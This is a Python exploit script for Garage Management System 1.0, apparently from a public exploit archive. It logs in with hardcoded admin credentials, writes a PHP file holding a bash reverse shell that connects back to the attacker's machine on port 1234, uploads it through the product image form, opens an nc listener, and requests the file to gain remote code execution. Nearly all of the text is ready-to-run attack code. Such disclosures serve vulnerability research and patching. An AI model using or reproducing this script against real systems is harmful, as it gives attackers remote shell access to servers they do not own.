Garage Management System 1.0 Shell Upload

# Exploit Title: Garage Management System Remote Code Execution via File Upload# Date: 24/07/2022# Exploit Author: saitamang# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/garage.zip# Version: 1.0# Tested on: Centos 7 + MySQLimport requests, subprocess, string, sys, warnings, time, concurrent.futuresfrom requests.packages.urllib3.exceptions import InsecureRequestWarningwarnings.simplefilter('ignore',InsecureRequestWarning)from netifaces import interfaces, ifaddresses, AF_INETreq = requests.Session()proxies = {    'http':'http://127.0.0.1:8080',     'https':'http://127.0.0.1:8080',    }def login(ip,username,password):      target = "http://%s/garage/garage/login.php" %ip    data = {'username':username,'password':password, 'login':''}    response = req.post(target, data=data)    if 'Login Successfully' in response.text:        print("[$] Success Login :)")        trigger_rce(req)    else:        print("[$] Failed Login :(")def creata_rs():    for ifaceName in interfaces():        addresses = [i['addr'] for i in ifaddresses(ifaceName).setdefault(AF_INET, [{'addr':'No IP addr'}] )]        if ifaceName=="eth0":            ipadd = ' '.join(addresses)            f = open("saitamang.php", "w")            payload = "<?php exec(\"/bin/bash -c 'bash -i >& /dev/tcp/"+str(ipadd)+"/1234 0>&1'\")?>"            f.write(payload)            f.close()        else:            passdef trigger_rce(req):    creata_rs()    target = "http://%s/garage/garage/php_action/createProduct.php" %ip    multipart_form_data = {    "currnt_date": (None,""),    "productImage": ("saitamang.php", open("saitamang.php", "rb")),    "productName" : (None,"test"),    "quantity" : (None,"1"),    "rate" : (None,"1"),    "brandName" : (None,"1"),    "categoryName" : (None,"1"),    "productStatus" : (None,"1"),    "create" : (None,"")    }    response = req.post(target, files=multipart_form_data)    print("[$] Enjoy your RCE :)")    req.get("http://%s/garage/garage/assets/myimages/saitamang.php" %ip)if __name__ == "__main__":    print("   _____       _ __                                   ")    print("  / ___/____ _(_) /_____ _____ ___  ____ _____  ____ _")    print("  \__ \/ __ `/ / __/ __ `/ __ `__ \/ __ `/ __ \/ __ `/")    print(" ___/ / /_/ / / /_/ /_/ / / / / / / /_/ / / / / /_/ / ")    print("/____/\__,_/_/\__/\__,_/_/ /_/ /_/\__,_/_/ /_/\__, /  ")    print("                                             /____/   \n\n")        try:        ip = sys.argv[1].strip()        username = "[email protected]"        password = "rootadmin"        subprocess.call(['terminator', '-e', 'nc -lvp 1234'])        time.sleep(2)        login(ip,username,password)            except IndexError:        print("[-] Usage %s <ip>" % sys.argv[0])        print("[-] Example: %s 192.168.100.x" % sys.argv[0])    sys.exit(-1)